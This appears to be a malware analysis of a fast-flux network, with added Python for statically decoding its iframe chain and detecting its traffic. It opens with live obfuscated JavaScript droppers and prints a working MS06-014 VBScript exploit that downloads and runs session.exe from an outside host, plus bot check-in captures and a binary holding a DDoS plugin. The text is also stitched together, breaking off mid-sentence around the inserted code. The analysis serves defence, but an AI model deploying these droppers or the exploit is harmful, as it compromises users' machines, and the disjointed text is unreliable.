<SCRIPT Language="JavaScript">
eval(unescape("%66%75%6E%63%74%69%6F%6E%20%64%28%73%29%7B%72%3D%6E%65%77%20%41%72%72%61%79%28%29%3B%74%3D%22%22%3B%6A%3D%30%3B%66%6F%72%28%69%3D%73%2E%6C%65%6E%67%74%68%2D%31%3B%69%3E%30%3B%69%2D%2D%29%7B%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%5E%32%29%3B%69%66%28%74%2E%6C%65%6E%67%74%68%3E%38%30%29%7B%72%5B%6A%2B%2B%5D%3D%74%3B%74%3D%22%22%7D%7D%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%72%2E%6A%6F%69%6E%28%22%22%29%2B%74%29%7D"));
d(unescape("%08<vrkpaq-> glmF ?qwvcvq,umflku<vrkpaq>"));
</SCRIPT>
<SCRIPT Language="JavaScript">
eval(unescape("%66%75%6E%63%74%69%6F%6E%20%64%28%73%29%7B%72%3D%6E%65%77%20%41%72%72%61%79%28%29%3B%74%3D%22%22%3B%6A%3D%30%3B%66%6F%72%28%69%3D%73%2E%6C%65%6E%67%74%68%2D%31%3B%69%3E%30%3B%69%2D%2D%29%7B%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%5E%32%29%3B%69%66%28%74%2E%6C%65%6E%67%74%68%3E%38%30%29%7B%72%5B%6A%2B%2B%5D%3D%74%3B%74%3D%22%22%7D%7D%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%72%2E%6A%6F%69%6E%28%22%22%29%2B%74%29%7D"));
d(unescape("%08<gocpdk-><3?vjekgj\"3?jvfku\" dke,12]pgfcgj-oma,a6a6`dcd8rvvj ?apq\"gocpdk>"));
</SCRIPT>
Unescaped, the eval() argument defines function d(s), which walks its argument backwards from the last character down to index 1 (the leading %08 byte is never read), XORs each character code with 2, and document.write()s the result. Applied to the second string, it yields the HTML below, which is nothing more than another iframe pulling content from a second site:
<script>window.status="Done"</script><iframe src="http://xxx.fafb4c4c.com/header_03.gif"></iframe>
The iframe's target, /header_03.gif (also served in flux), is another JavaScript-obfuscated file; its decoded result is:
<script>window.status="Done"</script><iframe src="http://xxx.fafb4c4c.com/routine.php" width=1 height=1></iframe>
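Because the decoder is so small (reverse the string, XOR each character code with 2), the whole iframe chain can be replayed statically, without a browser and without touching the live sites. The following Python is an added example for this page, not code from the paper: it unescapes the %XX-encoded decoder exactly as embedded above, re-implements d() as a pure function that returns instead of document.write()ing, and follows the iframes through a constructed, offline stand-in for the three stages. In that stand-in, landing.invalid is a hypothetical host for the landing page and its footer, the fafb4c4c.com URLs are the redacted ones shown in the decodes, the obfuscated stage bodies are generated from the decoded HTML shown above rather than copied from the sanitised originals, and the final stage is a placeholder, not the exploit.

```python
"""Static replay of the footer's JavaScript decoder and iframe chain."""
import re

# The %XX-escaped decoder exactly as it appears in the footer above; JS
# unescape() turns it back into the source of function d(s).
DECODER_ESCAPED = (
    "%66%75%6E%63%74%69%6F%6E%20%64%28%73%29%7B"
    "%72%3D%6E%65%77%20%41%72%72%61%79%28%29%3B%74%3D%22%22%3B%6A%3D%30%3B"
    "%66%6F%72%28%69%3D%73%2E%6C%65%6E%67%74%68%2D%31%3B%69%3E%30%3B%69%2D%2D%29%7B"
    "%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65"
    "%28%73%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%5E%32%29%3B"
    "%69%66%28%74%2E%6C%65%6E%67%74%68%3E%38%30%29%7B%72%5B%6A%2B%2B%5D%3D%74%3B%74%3D%22%22%7D%7D"
    "%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%72%2E%6A%6F%69%6E%28%22%22%29%2B%74%29%7D")


def js_unescape(s):
    """JavaScript unescape() for the %XX form used here."""
    return re.sub(r"%([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), s)


def js_d(s):
    """Python mirror of d(s): from the last character down to index 1 (index 0,
    the leading %08 byte, is never read), XOR each code point with 2. The
    original hands the result to document.write; this returns it instead."""
    return "".join(chr(ord(s[i]) ^ 2) for i in range(len(s) - 1, 0, -1))


def js_d_encode(plain):
    """Inverse of js_d, used only to build the constructed stage bodies below."""
    return "".join(chr(ord(c) ^ 2) for c in reversed(plain))


def obfuscated_stage(plain):
    """Wrap plain HTML the way the footer does: eval the escaped decoder, then
    call d() on the transformed payload. '%' is escaped so unescape() cannot
    misread it, and JS string escapes are applied for the double-quoted literal."""
    body = js_d_encode(plain).replace("%", "%25")
    literal = "%08" + body.replace("\\", "\\\\").replace('"', '\\"')
    return ('<SCRIPT Language="JavaScript">eval(unescape("{}"));'
            'd(unescape("{}"));</SCRIPT>').format(DECODER_ESCAPED, literal)


D_CALL = re.compile(r'd\(unescape\("((?:[^"\\]|\\.)*)"\)\)')
IFRAME_SRC = re.compile(r'<iframe\s+src="([^"]+)"', re.I)


def decode_stage(body):
    """Return what a browser would have document.write()n for one stage: each
    d(unescape("...")) call is evaluated statically (JS string escapes undone
    first). Bodies without such a call are returned untouched."""
    out = [js_d(js_unescape(re.sub(r"\\(.)", r"\1", m.group(1)))) for m in D_CALL.finditer(body)]
    return "".join(out) if out else body


def follow_chain(start_url, fetch, max_hops=10):
    """Walk iframe redirections from start_url with a caller-supplied
    fetch(url) -> body, stopping when a stage yields no iframe."""
    chain, url = [], start_url
    for _ in range(max_hops):
        decoded = decode_stage(fetch(url))
        chain.append((url, decoded))
        m = IFRAME_SRC.search(decoded)
        if not m:
            break
        url = m.group(1)
    return chain


# Constructed stand-in for the chain observed above. landing.invalid is a
# hypothetical host; the fafb4c4c.com URLs are the redacted ones from the
# decodes; the last stage is a placeholder, not the exploit.
STAGES = {
    "http://landing.invalid/da3e/index.php":
        '<!-- onRequestEnd --><iframe src="http://landing.invalid/.footer_01.gif" width=0 height=0></iframe>',
    "http://landing.invalid/.footer_01.gif": obfuscated_stage(
        '<script>window.status="Done"</script>'
        '<iframe src="http://xxx.fafb4c4c.com/header_03.gif"></iframe>'),
    "http://xxx.fafb4c4c.com/header_03.gif": obfuscated_stage(
        '<script>window.status="Done"</script>'
        '<iframe src="http://xxx.fafb4c4c.com/routine.php" width=1 height=1></iframe>'),
    "http://xxx.fafb4c4c.com/routine.php":
        '<SCRIPT language="VBScript">\' placeholder for the MS06-014 stage</SCRIPT>',
}

if __name__ == "__main__":
    for url, html in follow_chain("http://landing.invalid/da3e/index.php", lambda u: STAGES[u]):
        print(url, "->", html[:70])
```

Swapping the dictionary lookup for a real fetcher (ideally one that replays captured responses) turns this into a stage walker for the sanitised captures, and because d() runs as a pure function nothing is ever eval'd or written into a document. A fetch limit of ten hops keeps a looping chain from running forever.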
Following the iframe to /routine.php yields yet another JavaScript-obfuscated file. Its decoded result is an attempt to exploit vulnerable Internet Explorer clients through the MDAC RDS.DataSpace ActiveX control (MS06-014), for which Microsoft released a patch in May 2006. Below is the decode of the actual attack. Be careful: this is live exploit code.
<script type="text/javascript">function handleError(){return true;}window.onerror=handleError;</script>
<script>window.status="Done"</script>
<SCRIPT language="VBScript">
If navigator.appName="Microsoft Internet Explorer" Then
If InStr(navigator.platform,"Win32")<>0 Then
Dim Obj_Name
Dim Obj_Prog
set obj_RDS=document.createElement("object")
obj_RDS.setAttribute "id","obj_RDS"
obj_RDS.setAttribute "classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
fn="ntmusis32.exe"
Obj_Name="Shell"
Obj_Prog="Application"
set obj_ShellApp=obj_RDS.CreateObject(Obj_Name&"."&Obj_Prog,"")
Set oFolder=obj_ShellApp.NameSpace(20)
Set oFolderItem = oFolder.ParseName("Symbol.ttf")
Font_Path_Components = Split(oFolderItem.Path,"\",-1,1)
WinDir = Font_Path_Components(0)&"\"&Font_Path_Components(1)&"\"
fn = WinDir&fn
Obj_Name="Microsoft"
Obj_Prog="XMLHTTP"
set obj_msxml2=CreateObject(Obj_Name&"."&Obj_Prog)
obj_msxml2.open "GET","http://xxx.fafb4c4c.com/session.exe",False
obj_msxml2.send
On Error Resume Next
Obj_Name="ADODB"
Obj_Prog="Stream"
set obj_adodb=obj_RDS.CreateObject(Obj_Name&"."&Obj_Prog,"")
If Err.Number Then
Obj_Name="Scripting"
Obj_Prog="FileSystemObject"
Set obj_FileSys = obj_RDS.CreateObject(Obj_Name&"."&Obj_Prog,"")
Set download_file = obj_FileSys.CreateTextFile(fn,TRUE)
download_file_size = LenB(XMLBody)
For i = 1 To download_file_size
cByte = MidB(XMLBody,i,1)
ByteCode = AscB(cByte)
download_file.Write(Chr(ByteCode))
Next
download_file.Close
Obj_Name="WScript"
Obj_Prog="Shell"
Set obj_WShell = obj_RDS.CreateObject(Obj_Name&"."&Obj_Prog,"")
On Error Resume Next
obj_WShell.Run fn,1,FALSE
Else
obj_adodb.Type=1
obj_adodb.Open
obj_adodb.Write(obj_msxml2.responseBody)
obj_adodb.SaveToFile fn,2
obj_ShellApp.ShellExecute fn
End If
End If
End If
</SCRIPT>
The successful compromise of a Windows host via this exploit content results in the download of a malicious downloader stub executable, session.exe, which is then responsible for attempting to download the additional malicious components needed to integrate the newly compromised host into a fast-flux service network. The session.exe sample above attempts to download and execute the following components:

http://xxx.myfiles.hk/exes/webdl3x/weby.exe
http://xxx.myfiles.hk/exes/webdl3x/oly.exe
http://xxx.camgenie.com/weby7.exe

Supporting Detail: The following is a representative sampling of URLs to imageshack.us-hosted Flash files that perform one simple action: an ActionScript-based browser redirect to a flux-hosted combination phishing/drive-by exploit page that leverages the Internet Explorer (MDAC) Remote Code Execution Exploit (MS06-014). All of the files are identical, with the same MD5 and SHA1 hashes:

MD5: 6eaf6eed47fb52a6a87da8c829c7f8a0
SHA1: dc60b0fedf54eaf055c64ae6d434b8fc18252740

The modification time maintained by the Imageshack HTTP server suggests an SWF compile time of 2007-06-05 03:56:30 -0700. Decompiling the Flash component results in:

$ swfdump -atp ./xxx.imageshack.us/img527/3530/38023350se6.swf
[HEADER]        File version: 8
[HEADER]        File size: 98
[HEADER]        Frame rate: 120.000000
[HEADER]        Frame count: 1
[HEADER]        Movie width: 1.00
[HEADER]        Movie height: 1.00
[045]         4 FILEATTRIBUTES
[009]         3 SETBACKGROUNDCOLOR (ff/ff/ff)
[018]        31 PROTECT
[00c]        28 DOACTION
                (   24 bytes) action: GetUrl URL:"http://xxx.e447aa2.com" Label:""
                (    0 bytes) action: End
[001]         0 SHOWFRAME 1 (00:00:00,000)
[000]         0 END

Below are a few examples of URLs that host the same Flash file:

http://xxx.imageshack.us/img116/1299/97231039qx0.swf
http://xxx.imageshack.us/img116/1424/81562934sa1.swf
http://xxx.imageshack.us/img116/1699/63088115dg4.swf
http://xxx.imageshack.us/img116/1700/81458378cv3.swf
http://xxx.imageshack.us/img116/2453/70754097cm0.swf
http://xxx.imageshack.us/img116/2456/14892185hl4.swf
http://xxx.imageshack.us/img116/8345/26333607xo4.swf
http://xxx.imageshack.us/img120/3595/53060403mw7.swf

The following are examples of flux-serviced MySpace phish/drive-by domains referenced from presumably compromised MySpace user accounts, all observed during the same period, between 2007-06-26 17:35:44 and 23:18:00 (EDT, -0400):

xxx.myspace.com.index.cfm.fuseaction.user.mytoken.00b24yqc.ac8a562.com
xxx.myspace.com.index.cfm.fuseaction.user.mytoken.0c38outb.h5v17lt.com
xxx.myspace.com.index.cfm.fuseaction.user.mytoken.0en0r8xd.115534a.com
xxx.myspace.com.index.cfm.fuseaction.user.mytoken.0l3ttn77.oqrhldv.com
xxx.myspace.com.index.cfm.fuseaction.user.mytoken.0w4c4w74.jk33v96.com
xxx.myspace.com.index.cfm.fuseaction.user.mytoken.3kuto9a4.de082ak.com
xxx.myspace.com.index.cfm.fuseaction.user.mytoken.5c1wkjil.kirjmbr.com
GET /settings/weby/remote.php?os=XP&user=homenetab0148a&status=1&version=2.0&build=beta004&uptime=244813135872w%20244813135872d%20244813135892h%20244813135919m%20244813135929s HTTP/1.1
User-Agent: MSIE 7.0
Host: xxx.ifeelyou.info
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Tue, 03 Apr 2007 07:55:53 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Content-Length: 19
Connection: close
Content-Type: text/html; charset=UTF-8

Added Successfully!
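As an added example (not part of the paper), the Python below runs two detection rules over constructed proxy-log lines: one for the flux-agent check-in shown above (remote.php carrying the os/user/status/version/build/uptime parameters, sent with the bare "MSIE 7.0" User-Agent that no real Internet Explorer produces), and one for the MySpace-style flux phishing hostnames listed earlier, where a brand's domain appears as leading labels of a name registered elsewhere. The host agent-checkin.invalid and the client IPs are constructed placeholders; the lookalike name is one of those the paper lists.

```python
import re
from urllib.parse import urlsplit, parse_qs

BEACON_KEYS = {"os", "user", "status", "version", "build", "uptime"}
BRANDS = ("myspace.com",)   # registrable domains worth protecting; extend as needed
LOG_RE = re.compile(r'^\S+ \S+ \S+ \[[^\]]+\] "(\w+) (\S+) \S+" \d{3} \S+ "([^"]*)"$')

# Constructed sample lines (combined-log shape plus a User-Agent field). The
# check-in host is a placeholder; the lookalike name is one the paper lists.
SAMPLE_LOG = """\
10.0.0.5 - - [03/Apr/2007:07:55:53 -0400] "GET http://agent-checkin.invalid/settings/weby/remote.php?os=XP&user=homenetab0148a&status=1&version=2.0&build=beta004&uptime=1w HTTP/1.1" 200 19 "MSIE 7.0"
10.0.0.7 - - [03/Apr/2007:07:56:10 -0400] "GET http://www.example.com/index.html HTTP/1.1" 200 5120 "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
10.0.0.9 - - [26/Jun/2007:17:35:44 -0400] "GET http://xxx.myspace.com.index.cfm.fuseaction.user.mytoken.00b24yqc.ac8a562.com/ HTTP/1.1" 200 2048 "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
"""


def is_checkin(url: str, user_agent: str) -> bool:
    """Rule 1: remote.php carrying the flux-agent parameter set, or the bare
    'MSIE 7.0' UA (real IE sends 'Mozilla/4.0 (compatible; MSIE 7.0; ...)')."""
    parts = urlsplit(url)
    keys = set(parse_qs(parts.query))
    path_hit = parts.path.endswith("/remote.php") and BEACON_KEYS <= keys
    return path_hit or user_agent.strip() == "MSIE 7.0"


def lookalike_brand(host: str):
    """Rule 2: brand whose domain appears as labels inside `host` although
    `host` is not actually under that domain; None when nothing matches."""
    host = host.lower().rstrip(".")
    labels = host.split(".")
    for brand in BRANDS:
        if host == brand or host.endswith("." + brand):
            continue                      # genuinely under the brand: fine
        blabels = brand.split(".")
        for i in range(len(labels) - len(blabels) + 1):
            if labels[i:i + len(blabels)] == blabels:
                return brand
    return None


def scan(log_text: str):
    """Return (line_no, rule, host) for every log line that trips a rule."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue                      # unparsable line: skip, never crash
        _method, url, ua = m.groups()
        host = urlsplit(url).hostname or ""
        if is_checkin(url, ua):
            findings.append((n, "flux-agent-checkin", host))
        if lookalike_brand(host):
            findings.append((n, "brand-in-prefix-host", host))
    return findings
```

Calling scan(SAMPLE_LOG) flags line 1 as a check-in and line 3 as a brand-in-prefix host; the ordinary browsing on line 2 produces nothing.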
appears to be a consistent 197 byte binary/encoded configuration response. We are still attempting to complete reverse engineering of this session:
GET /settings/weby/settings.ini HTTP/1.1
User-Agent: MSIE 7.0
Host: xxxxxxxx.iconnectyou.biz
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Tue, 03 Apr 2007 07:55:40 GMT
Server: Apache/2.0.54 (Fedora)
Last-Modified: Mon, 02 Apr 2007 23:37:36 GMT
ETag: "8007ac5b-4bc7000"
Accept-Ranges: bytes
Content-Length: 197
Connection: close
Content-Type: text/plain; charset=UTF-8

[197-byte binary/encoded body: hex dump of the capture not reproduced here]
[hex dump of the follow-on download omitted; the recoverable ASCII of that capture follows]
... bytes
Content-Length: 9728
Connection: close
Content-Type: application/octet-stream

MZP... (PE executable)
...Portions Copyright (c) 1999,2003 Avenger by NhT...
...plugin_ddos.dll.Validate...
...plugin_ddos..WinSock..System..SysInit..Windows..UTypes..cshdr..WinInet..WinSock2...